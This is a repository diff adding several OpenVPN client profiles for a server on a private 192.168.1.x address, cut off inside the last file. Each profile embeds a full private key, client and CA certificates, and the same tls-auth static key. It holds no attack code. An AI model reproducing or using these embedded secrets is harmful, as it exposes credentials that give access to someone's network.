remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQC3HvMHw/05jiJc
/VY3uoigTUmlkvYKDk3G18CJ/p0zOdOAsYGEUgFBn4OV2QCDkam+uwICgNS6KgjS
l8SQ3+ULaqmMki1lWIi9o7aRxp7ioJ0UNOdVJo64G/rVloDUNCt+xeHleo7R6hFD
hqP4d4KIIPRHLFhU+IJ+tLaX5lRUMn2kZ4ezP5ERqSt0LsSZxKO4IswwAeuguvUx
tJgyu0YFV/Sq1/R/QpvWeEZO0/P+WnDL8xMo9WpRxRnWrVBlxJuhT976/Emdtjml
hDCgr478xtOyML+N7pbgDpbkJ92sTkO/ILEaY34CbuBtxHCtqFyDJ5QY37d8e9SZ
5ls2dM7fAgMBAAECggEAEuzC5xmNMQaMbJnN8EJ53j8+jjsK7G0gAp3HiztiGaov
PoyZuwgSkyqeGb1sfSxvo4OGKKYR1g+EC+eda++Hp09lqF5vDJtCvn6N3rDtOLSq
pyz0f2tVspdJrAs60zN1D0v6FZI98lnDYPwoNAR92/2z4SsnEdkA+4FHoZkvO+gz
KycoLfUZH1UMLKTFMmSX3dSxYzp7kPEZP2VBlyH1KA6/JE1G/fiyOdoYixgMcnCB
hZc0gPgJjRtwoQ8JXDz74uezGqm737tY+IA1DUoW4Ojcie3VAsPoZb300VecKuai
GT5KXMHgvnSUnSlJouGTebUvcDxlMzPhiO6CoN5gUQKBgQDcp3LQ3yJFnXTMqXmW
n7veHNcXUGQmo0H496L3c3XGcQt/smjOI/R+I3QQ1fogWBWaxvTSWjAZntMCJXD6
Tu/idtZnGF3Bxg8InpmAB9mljU0FhLkpdTCbXg+HGjkZ8NEj2/kndSGB8r49Px/6
NUJudE9VZkdiwaADaW8RAUuftwKBgQDUdFhCXwvUVsER4uZlwlRH4JgzHnClwO8r
dF7scKunMKtIStqYkfi5jc/YS4J+s2yP8KF+04NDk/PNqqvvdaak1dMVwAp/K1Pc
LZ1CqgcnuaTDhtflS/+EO7fUqazwxGqanom2NOC2sOHsGkYD8Ehb7GyhhW8KPzie
eP85mbN6GQKBgA6jnV52L1PnCmS5qbNwjYpC55JIZxyZIDtgUpOQOXQc8+JY99MV
V5c2yvCDAcE7ltNZ98ws55wLiXxO95vjuM6Ri8/zMeU1OrIbs5tm6e2t3jpLf+1c
NQlZyDXya29pJrb2VSVlBAAXFsABfCGhfvLNDKZhzsKijfcr+45pQ5cpAoGATXEv
btoYhMkuzWdJFpS0hhLPR+rzoufmBo//ve4AFAyAkvR+JBkpcfHIbo5vveGHVByh
sYpGEc8PksuAquPW38T1kbsT2HEhu2OBLHiv7QIVlhREBFgkhr4B72n+GTFvrnbV
ue4ib1WgtKCLHwpqRd+zZVkvNav/5nwyhHuLWZkCgYBky0RyDSzpm/DSZP3BvB2m
XtMat68OP6SK0SU0QT4deOM5EkOvhnkKjViRZ8f1PimDZufRz7rfEwfhEjZxrSYj
Mb7ZXFaDnzBJsxCnjq7f032SnAYD854gcdf+VrVxYfSBazcN8p8Wb0N4p8yOaVI0
iba/pI9zOZ1usvZsyy+pJQ==
-----END PRIVATE KEY-----
</key>
<cert>
-----BEGIN CERTIFICATE-----
MIIDVzCCAj+gAwIBAgIQGtgb8vOBzm9VXxqyeUeSnTANBgkqhkiG9w0BAQsFADAW
MRQwEgYDVQQDDAtFYXN5LVJTQSBDQTAeFw0yMTAxMjMwNDUyMDZaFw0yNDAxMDgw
NDUyMDZaMBQxEjAQBgNVBAMMCXNlY192cG5fMjCCASIwDQYJKoZIhvcNAQEBBQAD
ggEPADCCAQoCggEBALce8wfD/TmOIlz9Vje6iKBNSaWS9goOTcbXwIn+nTM504Cx
gYRSAUGfg5XZAIORqb67AgKA1LoqCNKXxJDf5QtqqYySLWVYiL2jtpHGnuKgnRQ0
51Umjrgb+tWWgNQ0K37F4eV6jtHqEUOGo/h3gogg9EcsWFT4gn60tpfmVFQyfaRn
h7M/kRGpK3QuxJnEo7gizDAB66C69TG0mDK7RgVX9KrX9H9Cm9Z4Rk7T8/5acMvz
Eyj1alHFGdatUGXEm6FP3vr8SZ22OaWEMKCvjvzG07Iwv43uluAOluQn3axOQ78g
sRpjfgJu4G3EcK2oXIMnlBjft3x71JnmWzZ0zt8CAwEAAaOBojCBnzAJBgNVHRME
AjAAMB0GA1UdDgQWBBSO/gU91bILWZYpApQoHgewvPHJ+jBRBgNVHSMESjBIgBQq
XIIQau9BBn3TLBYCAYgU3eSBrqEapBgwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0GC
FFFs/LbCAXkoa6MEwNisGWwg8TH+MBMGA1UdJQQMMAoGCCsGAQUFBwMCMAsGA1Ud
DwQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAQEAG5b3okfbW6ay+cM175cK9lgcruh/
P1ddn3ENVgPDU0174qfNYvtKNtWuF/I09oIQLfHHvS6THmoYo6XbTuTRBANXLixu
w0fyEcbYrhZ8S3esaH6CgZv/nhMH+QWnvpkliQ9HfR4FuDn3rX6OZvSjqouNiLJI
Q0PTsf2h9MDkcC/wV1cEwGbLk9iKM/p0S1Ri4s9qgggeueIWyIcQq3t2y7vomsat
k1fCKyliFhHkwPhnsjNMTcAc9Us0QxeULq5Bu/fQ77/oS3K6VcU7GAqv5GxP/Usc
GMKwaBnhsjZNLtVdNG8kVLRHLvPcg5TYPmEfNzzC3I8AI5c6MH2LmY8hYg==
-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----
MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL
BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw
MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm
43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH
NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX
4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX
/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk
Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd
BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv
QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2
wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq
hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT
f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/
+evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN
hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H
tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg
J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw==
-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>

110
project/sec_vpn_3.ovpn
View File

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCyvOI9Tz8JQoLP
bLhXTTdvxGqQMqc1HDRuOWsskMI7IIaUopR+maakYheorvcvf+f2EUwCvHGYnrwb
gGSNWIm+Clh1/zwuDsWvMTOBND3UYnIjpqbc5A5Pa++8gG+HsG9bBP2aFn8wMJKZ
rnfrxDyXiBi+40oEZgbzgmC0TvTwuUDYG+IivA754kDcHrzB+AJPLYAy89Hdr2pi
PE47LBc2v64wiq3mXwiEHqiHwulMTr21ozq2D78WaZkJkIbe8A8rnn2c+RoYBM4X
a+fPafW/KxJS1cADjR6QF8tr79zDSYfCeL9h//Or00Pl17vJrWk1r6fT9OdytM5C
S+C/dEI3AgMBAAECggEBAJNT5hgrLgZv8GsRbpFncH6MJFpfpju81+rTIWhGmhMq
qEP0DvqbpCRzRpUgQ1e/0m+dqk3HDsuCbAMvPbLUfBVNacU5cV11h7T0lUO20BA0
ZWjFgV0qDjGhAqcaJtRtthwMbQ2J5aTPJMfQa8DGrDsrT1po9yXRA4HMwfFd88BH
UXRIHQrwnNsC5FPwxINMFRHFklQGBb+AuS0SdEQp2R3DTU30kb+146HQs2vWmu3C
5EwRDaePKwQIbm1BYMakSYvt9WB5Gd5Z/WG8F9e+lIhaIgufdsZW1H+ktjM21hRt
8Y93wE8BHiXXcJh9u1CeaqysnUTp7r4cgh5ISL7uOWECgYEA5lfLEqO+VRegnXhf
70dG6NavmwIgxbcs2951CSPT3fRQc/Llft+jjuoa4aciVKZ1xTWcXITVDCwWeaOR
wvzcEHtuMyxqfe15HAQrCpvAwn9WxOPevtdH2QPz5Lvd0iqdDQLTOHQNqmFjImNo
VCHwM5WN05cgqAI1+7gx9OU0OhMCgYEAxqWTW8shGU9Pplovs7yeJE3/vjWxxXm3
ASu1+ckpCUirQ/C2kVSa5JJHdnHghl9NyVLeDDIKXjR7o4hEuNAQnqzkhIcymxHA
ghR/WrW5ojj0Yi6Qer9v2itTleXczpXZZUinZ57CvUSmH/SYhXFdgRfrCYP5epnI
9UDmpmuvW80CgYBgyMjSBy1FMc1R/S9KKgfYc8SLfCRrDyFxLRK+CWjPXQWlAo19
dtiRhzpOUFyzdtILUBBoK4QdPjUfXSQ06uxInKRcKjCAwxRdOj8fkPw4fSrnRdvl
Ei3lOKz1Eh8NXMxqmCJKGTFYwtzVqTFAEJaOBiv2mQymq28lWmrbPKdqMwKBgCyl
xmsZSsUviE1xc8tIF5s9VL/hvaUO6E0BEBOmXOzTQnswvTgI9g9tuVYr3jUVcpxP
Xc0L6jymOyvUUu3fBf1ECtCmun8UDFqwVLeEpMaLWpI+uQZ9xJwapNzKH0jncUdM
fyPRESANL/F6vlUv175OK+ulmAswSXSmM7Ev/uf5AoGAMw+Nmo7AvM707XCfF2Sh
HAuPYDZ2nw+Oymx1+Uo2SIXp6WjDvZ60VN5hCKFwU4PM6VNBiypEkjgF99Ix4mBH
2NleTGuJ4BgDJWMxJUEEDgqii4EisuMidebf1toeMp2anpFSFN0NTpLxDRstXoIs
TyUSfCwVyaichIb10Pb7fjs=
-----END PRIVATE KEY-----
</key>
<cert>
-----BEGIN CERTIFICATE-----
MIIDWDCCAkCgAwIBAgIRAOIdNBnDWhtdfZSO1oMj4YYwDQYJKoZIhvcNAQELBQAw
FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjEzWhcNMjQwMTA4
MDQ1MjEzWjAUMRIwEAYDVQQDDAlzZWNfdnBuXzMwggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQCyvOI9Tz8JQoLPbLhXTTdvxGqQMqc1HDRuOWsskMI7IIaU
opR+maakYheorvcvf+f2EUwCvHGYnrwbgGSNWIm+Clh1/zwuDsWvMTOBND3UYnIj
pqbc5A5Pa++8gG+HsG9bBP2aFn8wMJKZrnfrxDyXiBi+40oEZgbzgmC0TvTwuUDY
G+IivA754kDcHrzB+AJPLYAy89Hdr2piPE47LBc2v64wiq3mXwiEHqiHwulMTr21
ozq2D78WaZkJkIbe8A8rnn2c+RoYBM4Xa+fPafW/KxJS1cADjR6QF8tr79zDSYfC
eL9h//Or00Pl17vJrWk1r6fT9OdytM5CS+C/dEI3AgMBAAGjgaIwgZ8wCQYDVR0T
BAIwADAdBgNVHQ4EFgQUU3rhoIYQLsaMIugbI8eAgikHQwswUQYDVR0jBEowSIAU
KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB
ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV
HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAI3x+wAZ7wV7mdA4uLIPP6I72FED
gueB1cCkvFOXmrj0EGEKnQAOHlOQHX4BPkE+ZSUdzXRzt4+rN01OeE6NSG+SANKW
8rO5hYceP8sgMpgJ69on8uvKq2a/4kIWvs+lCGJCZ6oDBTMkZWoaKpnONjtrRzP9
hzHhznaKvHMsDkWf+W1IR9MYJ25JjhEsV4WUrVuLRXNTc5/RlEafHipsFNI3cJkW
pMXFwEpTyMp5pe/AGyM7Ih7u9hBUbyTnUuJUtFU4IS3Sbg8nO4srwKRJsM6GIIy6
jMGHfTeXDtYMb9xPeLc5jEKuYKY4J0cEYLBjFEN3ysczwl2ow3esjdC6qhs=
-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----
MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL
BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw
MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm
43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH
NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX
4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX
/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk
Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd
BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv
QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2
wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq
hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT
f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/
+evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN
hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H
tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg
J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw==
-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>

110
project/sec_vpn_4.ovpn
View File

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCUA5v4Y7WOoL68
06Vz7RcRQOwF5zTYXbwjk1ITvC2zYkTkaDbxNCoeVysl9HZ1v0jOmPr/iGIAFPcx
CbQkr4xTp9ZU7q1GcKEvvTu4f392XaRwVZFfWSW6DFbNVa11BogtzOym6+t6Datk
NP+2Luo2vV4fHwqSXI8DYcNijxkULtUvwZowdJhSiptA6uGZi9FlS0DKx3ux2VK3
ji87WhyxD0ocdHDPh21Mz1cNJlxlfPSw51guc5JXRjyw6Jp4iJ+JbFfGJYn2wz3L
CLn6iQKbdQV1p1sXcnjatYeXcglBTtwPu2a0O+E06BLFhAxBrlEpgsKN1RvCr8UA
2vFPYMnXAgMBAAECggEBAJOgKe8K2+l+j97bpTjDbu9pdj7JBJ8MlnpRFFrUpCw3
RgkdnDbk1WFfhYycj44PE/njAOzexQfZ4VYKnJ6+bFJ/orkhOLd53Ho13hu9Jo8T
BNB5t72Gt6chaW3xF0kSE77ClgJCaaFZguk2Jxk5H6crJnYZyryCDq3L00k4+kVy
kCMeXGzCrlBxtucYQbVGm7F6SUQEXvyv2eCStRuwVu2gnHqckrnX1HkQ3fNmmaIv
8tqCbqbh5JBu+6l4R0xOArOGCIORNlQC5xtXFevwV7o6ZCGf64n9vvkJ02lgosUp
EUmdoAxha2CKeH3BA/ZKH8VxyfZuNgFD1/avQXQ+RWkCgYEAxJ5xfSvcvkY32HEA
6UNAUOdSLXCM+mJR0MKE+zFGAqx9auHKasOk+IKo9v/4/PgZnSjyI3WzHQ2GmJqO
iLZrCJWr60ictoBDw62ZbVWuRoJUwAYe+icLoQC/fBIuwJRXnBqGqIH0jTLnQG+O
69rSFVfEWwLPTVxSFuYI8h9DOJsCgYEAwLdK/Axy/lpy6vHphTvgihNJ1Y2lNpWO
cgb4mURMixojvY7zRaLxzbmpBU1KpfK0z+jorjGTnuQ2RTuJ9/xRKGRd6aaJfQKG
x+AiKNrslltYYo74U42Mhw810Kq/RlmdvLfb2ify9eUtuEtWhr7q95mbWLfmnCBP
CRgR8ML68XUCgYEAvx3f5LK4+/7XE70sDJEBOGLRfzey4UKmkkwx5NTNX5X4xua4
0bRga+rdgFHp3ULv6tK9IviqZOgb18QMHhlqysppdOd85OyicdcRlrQ9FW5kIM8S
V0eSxyop9tjZtvm6exNRpwPDCWjcXcbSXrGxmWtZgrmldWXyqS1qrqbyuVcCgYBN
IM6E46KeQ6rcducj6JvsBt409tSZbO+umTWjeZ88yMBnHDAmvZkS4exQb+ehVOqi
jy+Yj8TqAaHqwXJtanE8vjaLzZgXDQzOL9jcCwpG/tX31Ap0viDw6Nh74+pbiIBF
yDvYKsblPMy4hoZhtUUqxTJUJn3IHHIlTJnZht+SBQKBgF4lQMpf1acfm4aODCS9
WIArMeifjSf2m1X4qmKf+hWkha7Aq4JHAVNDCF77ktLjo72la/647PPn1Yt1tgNE
T34bY/+iTyLmOULD3EPwSKU+MsVXWUnDn6gksEix+4qCxGVR9U5g/rJc0isAMr4R
X0zX3DnM7OioFwjGVjmw4OlP
-----END PRIVATE KEY-----
</key>
<cert>
-----BEGIN CERTIFICATE-----
MIIDWDCCAkCgAwIBAgIRALIrjDtKnvOlKzrDEsEquO0wDQYJKoZIhvcNAQELBQAw
FjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ1MjIxWhcNMjQwMTA4
MDQ1MjIxWjAUMRIwEAYDVQQDDAlzZWNfdnBuXzQwggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQCUA5v4Y7WOoL6806Vz7RcRQOwF5zTYXbwjk1ITvC2zYkTk
aDbxNCoeVysl9HZ1v0jOmPr/iGIAFPcxCbQkr4xTp9ZU7q1GcKEvvTu4f392XaRw
VZFfWSW6DFbNVa11BogtzOym6+t6DatkNP+2Luo2vV4fHwqSXI8DYcNijxkULtUv
wZowdJhSiptA6uGZi9FlS0DKx3ux2VK3ji87WhyxD0ocdHDPh21Mz1cNJlxlfPSw
51guc5JXRjyw6Jp4iJ+JbFfGJYn2wz3LCLn6iQKbdQV1p1sXcnjatYeXcglBTtwP
u2a0O+E06BLFhAxBrlEpgsKN1RvCr8UA2vFPYMnXAgMBAAGjgaIwgZ8wCQYDVR0T
BAIwADAdBgNVHQ4EFgQUNdDrzlEMV2SXtnLJ7Z/lzuq33mkwUQYDVR0jBEowSIAU
KlyCEGrvQQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENB
ghRRbPy2wgF5KGujBMDYrBlsIPEx/jATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNV
HQ8EBAMCB4AwDQYJKoZIhvcNAQELBQADggEBAAfcg0QmBzR0ACiFzCAa7cpJ3Lzt
/v7ooR9zUUJ40KkglWA0cAZaEhRRwpFzqYwKKmEgzWQtHTvS0sM/674RGA4FredV
iYYgZdmnxIvDAiWMIL765iK0NCK/qLdPTLfmELDJlf3bOCN/s8QwazUKbUPgWZJF
QsGMFuB+xXDFaYLQt/vO+aHxpDUe7mB4CNL4tUkejq16LMhJ2XQShfVqAJ0IhrX7
NmMDYK+qf788oTBABB6ROJTySJAgeQ34XGBYbKKdK6UMqi7VIkW5BNfAhusdFkhE
zep52EcL95JGXaCO/NAwdsVmYZMiko/GD8Ks0XrXO+HZLc9DUlLtOBcvfVY=
-----END CERTIFICATE-----
</cert>
<ca>
-----BEGIN CERTIFICATE-----
MIIDSzCCAjOgAwIBAgIUUWz8tsIBeShrowTA2KwZbCDxMf4wDQYJKoZIhvcNAQEL
BQAwFjEUMBIGA1UEAwwLRWFzeS1SU0EgQ0EwHhcNMjEwMTIzMDQ0NjM5WhcNMzEw
MTIxMDQ0NjM5WjAWMRQwEgYDVQQDDAtFYXN5LVJTQSBDQTCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAMlIgHdUbLlWaB+AFKC1KeIe2u9ZOq3LsY4esghm
43CgwxtrKRw87QV46RGGQmPoeKdp2Qe8im232nl1odr3r1O6/ohknTP02Q38zGBH
NyQF4cORiMHiYdS2XG0NUkf1vN0WlmwbYJHdxhGcs0/D0DGf5yY6t+j14o6xvJjX
4h4SQAfGm1p0AbEuoahY5Or4stFkUMxnUkIpZp8nGRTy+4ZMpYjOGRcaoaHQNDTX
/nPsS3AXrp5EZfZ9HIbJ68JtmUIPY803tvubDQx3C7CeiPGc/KfW7D/0SbKxh9Nk
Er25NLm8MBNQJjSs1fRMg6FlIFvR48+s446LtdWGfHedz4kCAwEAAaOBkDCBjTAd
BgNVHQ4EFgQUKlyCEGrvQQZ90ywWAgGIFN3kga4wUQYDVR0jBEowSIAUKlyCEGrv
QQZ90ywWAgGIFN3kga6hGqQYMBYxFDASBgNVBAMMC0Vhc3ktUlNBIENBghRRbPy2
wgF5KGujBMDYrBlsIPEx/jAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIBBjANBgkq
hkiG9w0BAQsFAAOCAQEAZTUmbIInXSV12DdxLOmgmiCH9BtDvXswyEfD4xMyspDT
f3SbXBiSJgfMMMys9QrLYZ06Rg+tNxGoYX7fPjiLcH5UlB3muGMNFyrL6y1mJ1C/
+evvYjWnm6ATT6uigW0IO6mzNie3FDSitSXvZAwv+9mskuoes2I5C7EKYrixfIyN
hRfI5JYbQgTB9FI6qrrFAinnJcynWAOjoyMabfUrUme/wiKtNCzPqmmwUYh5i7+H
tfiZQ7Qkshv4VQxkq2dmq4VAPx0cuHrjVQ8ZfHhNZcX2HNsynP2KZJKLXe1pn5pg
J0D5kG11BAA8e5LNMXl42KNuQyZCh2LClkwz4Sx2Rw==
-----END CERTIFICATE-----
</ca>
key-direction 1
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d4d47aea6be3bda4549f485b7c38d287
312509957ccf26428848e3095c429eee
99196bd9edb0da94b5c9209debd8d455
41bce3ed5f5631031775359d49e49d87
8af81b53e7f909d1b47a1fbc03e2206b
98bf518e41a43da80a652e19e39dae39
7fa5ab1a7aff1b141b1952c1f61296b1
363fc7a891a21acc354253e9a6a5123f
8e36e40b486b7ba40542f77749b45bf5
27b5899c26333e11a18e90a6857f3c36
49abe06d3afabee6f97cbc65fcc6e74e
6db46cd53e71ef4412b7328a278e9de2
d50adaf4c942600aba4c011fa04d1368
87ffd6f73adc9b7a772efb570e59f798
e8cdd96c8dbc018535c3e04170dd309d
1809e77f2f216d6fc95d706ae5400eab
-----END OpenVPN Static key V1-----
</tls-auth>

110
project/sec_vpn_5.ovpn
View File

@ -0,0 +1,110 @@
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote 192.168.1.5 1194 udp
float
<key>
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCg9D/IFmmR74x7
kTMBpnz7/xRczL1SLcvqk2EgCwFsHHHvtEEu/wdEgJLKoaF4gTpPQ4NaZ51e5XsG
d7CHwg9B4EW5bydfw16L9V7X54C/Abpo/LS/kT1sLbBMxR5nLuU0WarokE1ivQ2q
gOFsrlPfvYDkhuxGZ6TBMZR4WQC10D6AgPWXF3L0Ld3GlxzzKNDe6zwynEVnNw2w
LO0KmZ6i5x2dkvcMn3zwgEy1RTS2OF6U9qpWadmjSsND7caR4Am4XKSYNuI4Dsyz
QJEMctbOrMTTeNIYJKuAnX1Yp4dXK5cN7YT5hnJfnBr1H3vkmUh1oaYBToOQhLCM
rwjgvTH3AgMBAAECggEAPxU74loWamIu90dDbIQqPEIPYwfDs+/LGldFG9/0YMEN
TtuhKKA/4vNZlR2gQbC0f9iAJPCzVzwt6a0DfVHr1O/no/QSxI+4ALbcw1Yyuaod
u4Q/+00be8i0boJblillIA181MWp7ucV8hutPoFc0jZdzDOtazK3+hhKjpijlJ44
lBPRcbQGEPrYs2TEEJ0hWHwr0himlId2lC11wygcu1n4TdsoFAScccPVpCbqOKrq
SwbBeaC+HWO6J30b3dsQ38ZOygMdB9cen2ItQAZdW6aIqgSu6gF/2IhM3JACPuO9
VJj56FAeetZgLwO6c9Vii98UO2Hm+HFhyI9WnAaOoQKBgQDQi2EyGnvJe6WsfLoh
OCh3vvM4F5pdo98cRhrm/SvhyF/OvL8H50hbJtDs4fEWGgJIV8xOk+NSrqJX20k7
Thpge7EMRqZjkXlZvKIq+9w+aBDKyb1kmuO/BadJh/Zlt9h1jctEc00IPzypfip1
NiPQe9Vd0NZeL1dFWnoxMhr2/wKBgQDFlIZNzo7eBjT5rEcm7nn63Ylsq+p6LezP
1KwBx9f7XnVU+r8GansvrWrPgqyJ7w/EGHA3/wUk9qw2HZoqUh1W2GpPBYpx0wNV
1g9kjEG056gnFMgTbMjojZ4auxiEFSYo5G8Mi8kLS6OQbUAotieWJFGiCvlUGWUh
Gwh1vNB9CQKBgFG6jfjo0CKCRsd2iiuCqrljKEaPWXvhQQr/noNwLMZrlMCcz/D0
/zJZ3/81/RnAT6yyW+tfofNBZXYxBl4rmcK+NwCsn4Dd/kTg3F0kH4iFmC8hKQxI
d4DhYlI66qGqjzZiv4qv9TyKK+fw/gq5kQefwFroAVsgCn+vmbu1+0NZAoGAYHqw
Qlo1BVG+mJR5ghc9VTTMoFYqf1LhqnLNM2lknAh5/u8aTIW+dX+XApFqs0gbSMQu
OAm9d1lEqoA2AahrTzcKYl/wRLinjkii55RdmXrtb3gEYwfh6z0MET1/MTAqnBk/
6L5xg6SB0Eqo47hfCD/f5OK68UgdS9cpgGSc4hECgYAH2bc7xDulyt5tIknzTfRv
iwTipQBJPyK+OGamw83B9l/1I+QJ9EmB+Zn7JmPiWqhViD9V5GlmbUBqiarJXF5Z
mW7VY2BsLsKOuGKprcJO83XpM8LtW6bBlCtfU8hAHeoBX0j8F99isN5ZmwnEHLLY
awaMoHH/Znwdrgg2E7NBwA==
-----END PRIVATE KEY-----
